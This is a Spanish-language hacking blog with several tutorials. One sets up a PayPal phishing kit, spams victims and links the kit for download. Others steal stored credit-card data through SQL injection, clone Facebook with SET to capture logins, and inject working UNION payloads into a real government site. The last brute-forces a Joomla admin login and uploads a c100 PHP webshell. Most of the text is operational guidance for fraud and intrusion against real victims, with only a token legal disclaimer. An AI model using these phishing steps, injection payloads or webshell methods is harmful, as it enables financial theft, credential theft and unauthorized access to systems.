HACKER ANGELWHITE GALC

viernes, 25 de julio de 2014

Tutorial de Carding y sus metodos de ataque



Últimamente se esta poniendo muy de moda el tema de el " Carding"" a nivel de todo latino América, no hay que ser un profesional ni siquiera  un "Hacker" como dicen muchos por concepto erróneo de este tipo de método  , ya que eh visto a muchas personas que nisiquiera saben hacer un simple " ByPass" or Sql inyeccion metodo POST en los risk entre otros payloads de una simple herramienta como "Sqlmap" o ni muchos menos saben utilizar "Mfsconsole", digo esto porque es la realidad y soy de las personas que digo las cosas como son .

Antes de comenzar los métodos de ataque de este escenario , quiero aclarar que no enseñare a utilizar un proxy u algo, ya que ese post lo tienen en mi "BLOG" , guerra revisada no mata gente bueno sigamos :


SCAMS  + Mailers Spammer

En este tema tocaremos sobre la plataforma que trabaja el carder y como nosotros podemos tener la nuestra  de una manera  tan sensilla

Pasos  :

   1- Tener un scams actualizado de paypal :
   2-Tener un Cpanel para subirlo al servidor

 Una ves obtenido estos dos requisitos, vamos a subir nuestro scam mediatnte el "upload" del Cpanel en la opcion " cargar " debemos comprimir nuestro scam en extension " .zip " para que lo descomprima sin ningun problema luego de ello una vez subido nuestro scam :





Una vez subido como vemos en la  imagen nosotros editaremos el archivo " Email.php " y nos saldra este codigo :

<?
$send = "youemail@hotmail.com";  ///////////// CHANGE YOUR EMAIL OK.
?>

nosotros en la parte del correo electronico le pondremos  nuestro correo para que llege los datos  de las personas, pero no creen que seria algo un poco cursi ? tanto si nos rastrean los datos de envios u  otro, bueno perfecto este scam tambien tiene la opcion de guardar los datos en .TXT en la misma we de manera automatica sin modificar nada sigamos.

Ya tenemos nuestro Scam 100 % estable :



 Una vez completado ahora lo que haremos sera spamear una lista de correos electronicos que esten con cuentas de paypal / se puede obtener dumpeando un sitio web  que tenga las tablas de paypal y los corrreos electronicos o utilizadno un extractor de correos a una web de "Shop" enlazada con paypal , pero para ello nesesitamos lo siguiente :

  1-  Mailer.php para enviar el spam a los correos
  2- Letter en este caso de paypal para enviar el mensaje mediante html

 Les aconsejo que suban el Mailer.php en un servidor aparte , que no este en el mismo servidor del scam ya que el mailer  puede ser quemado facilmente.

Bueno una ves subido el mailer.php lo tendremos de la siguiente manera :



Aqui es donde entra en funcion el " Letter " , el  Letter no es mas que un archivo contenedor del codigo fuente del mensaje que paypal deja en los correos electronicos de los usuarios para  una seria de procesos en la cuenta del usuario :



 Antes de pegar el codigo del  lettler debemos modificar algunas cosas por ejemplo el link de la web
donde se direccionara el mensaje en este caso la web de nuestro "Scam "

View Source :

 <html>
    <body>
        <p>
            <a href="http://yourdomaine.com"><img alt="" src="http://s15.postimg.org/pfih678h7/222222.png" /></a></p>
    </body>
</html>

-------------------------------------------------------------------------------------------------------------------------

Source Edit :

<html>
    <body>
        <p>
            <a href="http://ejemploscam.com/hi"><img alt="" src="http://s15.postimg.org/pfih678h7/222222.png" /></a></p>
    </body>
</html>





Una ves modificado correctamente llenaremos los datos del email.php , para spamear los correos electronicos :

Requito :

   1- Tener una lista de correos electronicos
   2-Copiar el source del lettler en Message Box :


Ejemplo de datos que se debe poner :



Luego de ello le daremos en " Send eMails ", para que empieze a enviar el mensaje :





 Una vez enviado los mensajes  a la bandeja de entrada del correo, en este caso la victima creera que fue enviado por la misma web de Paypal :



La victima le dara clip en el enlace :

Click Here To Verfiy Your Account info

luego de ello la victima caera en nuestra trampa y pondra los datos  de su tarjeta de credito  y su cuenta de paypal  en esta seccion de aqui  :




Luego que la victima aya puesto todos sus datos y aceptado en las opciones de continuar, automaticamente  se guardara el  registro y se creara una carpeta en nuestro scam llamada  Rezult/CREDIT.txt mas el archivo donde se almacenaran los datos de la tarjeta de credito



Link de descarga de todo lo utilizado en este proceso :

Código: [Seleccionar]
 http://www.mediafire.com/download/d9ep6so990ywc01/Scam+Paypal+2014+%2B+Mailer+%2B+Letller.rar



 DUMPEO DE CCV

el dumpeo de las datos de una tarjeta , no es mas que una inyeccion SQL mediante una herramienta como sqlmap o havij , ya que solo extraeremos los datos que almacene la DB .

Quizas el metodo de hallar es utilizando las "dorks" de google ya que la mayoria las usa para este tipo de ataque  de algunas dork especialmente de Carding ,en este proceso  de ataque es algo comun pero este nos dara $ $ $ .

Primero nesesitamos una web vulnerable en ese caso :

    http://www.localhost.com/category.php?cat_id=1

 
 Una ves extraido la base de datos " la mayoria de tarjetas de credito se encuentren en las Tablas "Orders" o " Shopping_cart " se encuentran los datos de las CCV


Database: db309014570
[15 tables]
+-----------------------+
| categories            |
| contents              |
| login                 |
| orders                |
| orders_temp           |
| ordersp               |
| ordersp_temp          |
| products              |
| resale                |
| resale_temp           |
| shopping_cart_info    |
| shoppingcart          |
| user_credit_cart_info |
| users                 |
| users_wishlist        |
+-----------------------+


Aver entraremos en la tabla " shopping_cart_info " y veamos que nos arroja :



como vemos no ah dado informacion sobre los datos de las CCV , pero si se fijan hay mas tablas donde puede aver mas informacion para sacarle mas jugo a todo ese dinero $ $ $

entraremos a la tabla " users ", ya que estos usuarios registran su datos  para poder comprar productos de la web la cual nos hace tener acceso a este sitio 100 % cardeable tanto de extraccion como para realizar nuestras compras aqui mismo.



como vemos esta web es cardeable internamente, bueno sin mas que decir me despito ante ustedes se me olvida decirles algo , al momento de dumpear y comprar productos les aconsejo uilizar siempre un proxy Socks5 Premium , quizas uno podra decir vaya protego mi IP y listo, pero no mis queridos amigos(a) , la mac juega un rol importante en el soporto de un ordenador de la misma empresa, ya que es su numero  de " SERIE" y pocos le toman importancia  a ello les dejare una herramienta "Premium" para cambiar nuestra Mac de manera manual :



 Link de descarga :

http://www.mediafire.com/download/y5g2oiqdhsaasvk/Technitium_MAC_Address_Changer_v6.0.3_Setup.rar

Sin mas que decir me despido un saludo mis queridos fieles lectores  .


Tema Tomado de la Pagina de Mi amigo  Omar 

http://blacklast-security.com/index.php

Clonando sitio web con Set ( Social Engineer Toolkit )


 Saludos nuevamente  mis queridos fieles lectores y visitantes de mi humilde blog, en esta oportunidad tocaremos sobre el tema del "Phishing or /Fake or /Scam" y el metodo de ataque conocido mediante Set ( Social Engineer Toolkit ) en Kali linux.



Phishing - es el método mas utilizado por los ciberdelincuentes para estafar y obtener información de las victimas en este caso sobre el correo electrónico o usuario y la contraseña para el robo de dinero o de perfil del usuario en general , Clonando una pagina web donde lo enviara a la victima asiendo creer que es la web original y obtener toda su información en segundos.

Utilizando SET

Abriremos primeramente el SET :

 Aplicaciones > Kali Linux > Herramientas de Explotación > Herramienta de Ingeniería Social >setoolkit


Lo primero que haremos sera poner el la opcion "1 " ,porque ?
porque simplemente utilizaremos el medio de ataque Ingiera social


 
 
Como vemos nos sale otras 11 opciones la que nosotros escogeremos sera el numero " 2 " , porque utilizaremos un sitio web para clonar y crear el medio de ataque.



Luego de ello nos saldra nuevamente otras 8 opciones donde nosotros pondremos el numero "3"
porque vamos a  clonar la web al igual que lo subirá en el servidor Local y a recibir los datos de la victima.
 
 
 
 
Luego de ello nos saldrá nuevamente lo siguiente :

 
 
 
Le pondremos " 2 " . nos pedirá la IP  para crear el servidor infectado con el Pishing ! le procedemos a poner la IP "LOCAL" 192.168.10.104 "
luego nos parecerá una interrogante la cual nos dice que sitio web deseamos clonar :
en este caso lo mas utilizado "www.facebook.com"




Como vemos el servidor esta On  para verificar nuestro Pishing tecleamos nuestra IP que pusimos en este caso 192.168.10.104 en el navegador :



Lo que haremos sera enviarle el link  a la victima  y utilizar nuestro ingenio del metodo la cual sera emitido el mensaje y el link

La victima una vez aya abierto el link , creera que es la web original  la cual pondrá sus datos del perfil en este caso :




Luego de que la victima le haga clip en "iniciar sesión" automáticamente sera direccionado a la web original de facebook !, pero lo mejor es que ya hemos capturado los paquetes de datos la cual automáticamente sera visible en la terminal del Set

Example :



Saludos.
 
 

INYECCION SQL LIVE HTTP


Hola amigos de blacklast-security como verán en este post les vengo a explicar como explotar una base de datos mediante consultas y sentencias manualmente pero está vez ya sería de una forma distinta usando el complemento firefox add-nos Live HTTP Headers, bueno como verán soy un chico de 10 años de edad muchos no creen(no soy hacktivista ni mucho menos parte de anonymous), soy un lector y he aprendido mucho en este mundo de la informática la verdad ignoro mucho a la gente creida y tampoco no me importa lo qué digan los demás, me baso básicamente en la programación, criptografía, pentesting web, Ingeniería social, Ingeniería Inversa, bueno entonces empezemos  :P .

¿Como qué en metodo Post?

Pués esta vez para utilizar este metodo necesitariamos el complemento add-nos para Mozilla Firefox (Live HTTP Headers), este complemento lo que hace es capturar las cabeceras y el tráfico de donde nosotros hemos entrado además también podremos ver nuestras cookies, bueno empezemos como verán mi victima será la web del gobierno de Brasil pero no la mostrare ya por seguridad.

Bueno entonces comenzemos como explique antes, para este metodo necesitariamos alguna barra de busqueda para comenzar a consultar la base de datos, bueno entonces como podrán ver encontre una barra de busqueda entonces en esa barra colocare cualquier número y nos aparecerá lo siguiente en el complemento add-nos Live HTTP Headers.


Vale y como ven nos ha capturado la cabeceras y ahora haremos lo siguiente, en la primera barra donde aparecera la URL daremos a repetir y nos aparecerá lo siguiente.


Bueno y como vemos la repetición esta en contenido "POST", ahora como vemos en el contenido post nos apareció "busca=1", okey entonces colocaremos una tilde y veremos si es vulnerable o no.


Y como podremos ver es vulnerable la website !, ahora colocaremos lo siguiente para comenzar a consultar la base de datos, comenzaremos colocando "order by unnúmero--+" donde dice unnúmero es donde elegiremos cualquier número que nosotros queramos otra cosa para saber si esta es la columna o no es la columna a veces nos aparecerá nada, algunas otras veces nos aparecerá error algunas otras veces nos aparecerá "Unkown Column" y cuando es la columna pués no tiene que aparecer el complemento completo de la página web, bueno comenzemos colocando "order by 8--+"


Bueno y como vemos no es la columna ahora probemos con "order by 7--+" haber si esta es la columna.


Y como vemós esta si es la columna !, ahora pondremos lo siguiente para que nos comienze a dar las consultas de la base de datos, colocaremos "union select 1,2,3,4,5,6,7--+" sin las comillas y nos aparecerá lo siguiente.

Y como vemós nos apareció el número "2" entonces ese es el que elegiremos para comenzar a consultar la base de datos, entonces borraremos el número "2" y pondremos lo siguiente.

Código: [Seleccionar]
union select 1,group_concat(0x3c62723e,table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--+

Y como verán en la imagen esas son las tablas de la base de datos, ya casi llegamos al último paso, bueno entonces elegiremos la tabla "categorias" para evitarnos problemas al públicar los datos del administrador, okey entonces ahora haremos pondremos lo siguiente.

Código: [Seleccionar]
union select 1,group_concat(0x3c62723e,column_name),3,4,5,6,7 from information_schema.columns where table_name=0x63617465676f72696173--+

Como verán el 0x no significa nada pero el "63617465676f72696173" es el nombre de categorias y como lo encodie, pués muy fácil como se me habia olvidado antes también necesitariamos el complemento HackBar, y en que parte de la sección lo encodeo?, pués muy fácil les pasaré una imagen de la sección.



Le daremos click pondremos el nombre de la tabla y listo estará encodeado, bueno ahora siguamos, colocamos lo que escrbí y nos quedaría así.


Y como vemos nos ha aparecido las columnas de la tabla categorias (id, nome), y como vemos en la imagen solo hay dos entonces pondríamos lo siguiente para completar el resultado de las consultas al sacar la base de datos.
Código: [Seleccionar]
busca=1' union select 1,group_concat(0x3c62723e,0x3d,id,0x3d,nome),3,4,5,6,7 from categorias--+


Y como vemos nos ha sacado la información de la columna !, otra cosa el "0x3d" significa el signo (=) pero en forma en hexadecimal, bueno entonces esto sería todo antes de nada este post lo hice hace aproximadamente hace 2 meses en mi blog pero lo he revivido para los qué no sabían este metódo de ataque lo aprendierán, hasta la próxima !.

sábado, 12 de julio de 2014

USANDO JOOMLA SCAN

Una vez hemos terminado nuestra serie de Metasploitable, me pregunte cual seria un tema que pudiera llamar la atención, que tuviera impacto inmediato, que causara alarma… y que pudiera sufrirlo un usuario medio, pues un ataque a un CMS, hoy en día que todo el mundo (poco mas o menos) sentimos la necesidad de comunicarnos, ya sea para mostrar nuestras fotos del verano o para promocionar nuestro pequeño comercio, muchísima gente utiliza un CMS como punto de partida lo cual es fantástico, pero a la vez peligroso…

Antes de continuar vamos a ver como define la wikipedia a un CMS:
‘Un sistema de gestión de contenidos (o CMS, del ingles Content Management System) es un programa que permite crear una estructura de soporte (framework) para la creación y administración de contenidos, principalmente en paginas web, por parte de los administradores, editores, participantes y demás roles.
Consiste en una interfaz que controla una o varias bases de datos donde se aloja el contenido del sitio web. El sistema permite manejar de manera independiente el contenido y el diseño. Así, es posible manejar el contenido y darle en cualquier momento un diseño distinto al sitio web sin tener que darle formato al contenido de nuevo, además de permitir la fácil y controlada publicación en el sitio a varios editores. Un ejemplo clásico es el de editores que cargan el contenido al sistema y otro de nivel superior (moderador o administrador) que permite que estos contenidos sean visibles a todo el público (los aprueba).’
Bien, el concepto es claro habría que añadir que estos cms se encuentran sobre:
Un sistema de infraestructura de Internet que usa las siguientes herramientas:
  • Windows o Linux como S.O.;
  • Apache como servidor web;
  • MySQL como gestor de base de datos;
  • PHP, Perl o Python como lenguaje de programación .
El uso de un WAMP  o LAMP permite servir páginas html a Internet, además de poder gestionar datos en ellas, al mismo tiempo un WAMP o LAMP, proporciona lenguajes de programación para desarrollar aplicaciones web, por lo tanto:
  • LAMP es el sistema análogo que corre bajo ambiente Linux
  • WAMP es el sistema análogo que corre bajo ambiente Windows
  • MAMP es el sistema análogo que corre bajo ambiente Macintosh
Tengamos en cuenta también que su implementacion es sumamente sencilla precisamente para facilitar su rápido e indoloro despliegue, si deseáis conocer como se realiza detalladamente en este link tenéis un manual de como realizarlo.
Bien volvamos al tema que nos ocupa que me estoy diluyendo… no voy a entrar muy de lleno en la instalación de wamp ya que tenéis un manual…(el link anterior) solo una par de pantallazos en primer lugar la vista de los ejecutables de joomla-2.5.14 y xampp…


1

 y el contenido de la carpeta htdoc de joomla una vez instalado en xamp



2 

Y el resultado de la misma con la ventana principal de joomla o frontend en todo su esplendor…

3 

 y también la ventana de acceso al backend de administración del cms…

 
4

 bueno os muestro también una captura del back-end, la zona de administración propiamente dicha…



5


 Y nos metemos en harina propiamente dicha, para ello actuaremos como si no supiéramos nada mas que tenemos una dirección url http://www.ganagana.com.co/  que alberga una web que esta gestionada por un cms que se llama joomla que la versión del mismo es la 2.5.14 y que tenemos acceso a la ventana de acceso al back-end, esto es importante por que nos hace saltarnos un paso pequeño que es buscar dicho acceso, pero tratamos con una instalación por defecto de joomla por tanto “keep it simple”…


 
6

Para ello utilizaremos OWASP joomscan que como veis en la captura se trata de un escaner de vulnerabilidades especifico para la plataforma cms joomla, os expongo los parámetros que podemos configurar sobre la herramienta y ejemplos de su forma de uso…

7

Una vez visto esto pues haremos uso de la herramienta mediante la introduccion de joomscan -u http://172.16.9.129/joomla_2.5.14 , obviamente la opcion -u es la url que deseamos escanear…
8

Y comienza su trabajo, fijaos en la ultima linea de la captura anterior… checking if the target has deployed an Anti-Scanner measure, comprueba si tenemos un anti escaneo en el cms, y también nos indica que corre sobre apache 2.2.11 y php 5.2.9 por lo tanto aunque no consiguiéramos nada tendríamos información muy importante…también nos indica que no hay un firewall instalado sobre joomla, lo único mosqueante es que nos pregunta si es joomla en el fingerprint de la url, y en este caso es una certeza! pero en fin puede ser un bug…pero es una versión sin actualizar, continuamos…

.
9

Os podría aburrir con las capturas de las 49 pruebas que realiza el escaner pero prescindiré de ellas y os indico que las 2 que se observan en la captura superior son la únicas que muestra…lo que si hay son bastantes N/D para muestra un botón…


10

Y se nos indica cuando alcanza el fin el escaneo con el numero de pruebas y el resultado de las vulnerabilidades encontradas…

11

vemos el resultado al que ha llegado en 1 minuto y 32 segundos…se nos aclara el panorama ligeramente… vemos como la vulnerabilidad numero 2 nos dice que el directorio del administrador no esta protegido y que por tanto un atacante malintencionado (hay alguno que no lo sea???…al menos momentáneamente???….) podría atacar las cuentas de administrador por fuerza bruta, suena bien verdad?…

9

¿Y como lo vamos a realizar? pues con un script confeccionado en python de nombre Bjoomla y escrito por zonesec que os presento en la siguiente captura, donde os muestro los parámetros configurables del script
12

Y como lo vamos a utilizar nosotros mediante el comando “python bjoomla.py -U users.txt -P pass.txt -h http://172.16.9.129/joomla_2.5.14/administrator&#8221;, donde la opción -U le indica que utilice el siguiente diccionario de usuarios…


14

la opción -P le indica que use el siguiente diccionario de contraseñas…


13

y la opción -h la url de prueba que utilizamos en esta practica…


4

y de nuevo vemos el script ejecutado y el resultado del mismo, vemos al final de la ejecución que nos muestra un error pero lo mejor de todo es que antes nos muestra el juego de credenciales del administrador admin-admin…


12
comprobemos si nos permite acceder al backend de esta instalacion de joomla…
  1. 5

HASTA LA COCINA!!!!…da que pensar ¿verdad? escasos 6 minutos…vamos de hecho estoy tardando mas en escribir este post que lo que tarde en entrar en joomla con la instalación por defecto!!!…
Ahora pongámonos en la mente de un atacante que no quiera llamar la atención, que podríamos hacer? pues lo típico subamos una shell!!!!…
***BIEN AHORA LLEGA EL TURNO DE LAS ADVERTENCIAS, TE INDICO QUE CUALQUIER TIPO DE MANIPULACIÓN QUE SE LLEGUE A REALIZAR SOBRE EL SOFTWARE DE UN EQUIPO REMOTO ES UN DELITO, TENLO EN CUENTA!! DESDE ESTE BLOG NUNCA APOYAREMOS ESAS PRACTICAS, POR LO TANTO TE RECUERDO QUE LA PRESENTE ACTIVIDAD ES REALIZADA DENTRO DE UN ENTORNO CONTROLADO DE MAQUINAS VIRTUALES PROPIAS QUE ADEMAS SE TE INDICA COMO CONFIGURAR***
Bien sin mas preámbulos vamos a buscar una shell adecuada para esta plataforma, sera una shell en php, si realizamos una búsqueda en google encontraremos mil, en este caso nos hemos decantado por la webshell c100, la encontraremos en pastebin como mostramos a continuación…

16
La guardamos como elnombrequetedelagana.php y nos la reservamos, otro peque;o apunte vamos a usar la forma mas sencilla de realizar esto, tampoco se van a dar mas pistas de las necesarias, y nos dirigimos dentro del backend o zona de administración del cms y seleccionaremos media manager…
5
y si intentamos subir la shell desde ahí sin mas nos dirá que no esta permitido… entonces?  sencillo habremos de cambiar las opciones de subida, en configuración global, y habremos de a;adir php a las extensiones legales, tal como se observa a continuación…
18
una vez realizado lo anterior, ya podremos ir a media manager y realizar la subida de nuestra shell, pulsaremos browse seleccionaremos nuestra shell y pulsaremos upload…tened en cuenta que lo que subamos se encontrara en el directorio %userdir%/xampp/htdocs/joomla/images importante!
19

vemos como nuestra shell se llama raw.php

20
 la seleccionamos y subimos y vemos que se encuentra en el directorio….
21


Una vez aquí tenemos todo el trabajo hecho… por lo tanto nos despedimos del backend, y nos dirigiremos a nuestra shell para ello introduciremos como url http://172.16.9.129/joomla_2.5.14/images/raw.php y observaremos el resultado…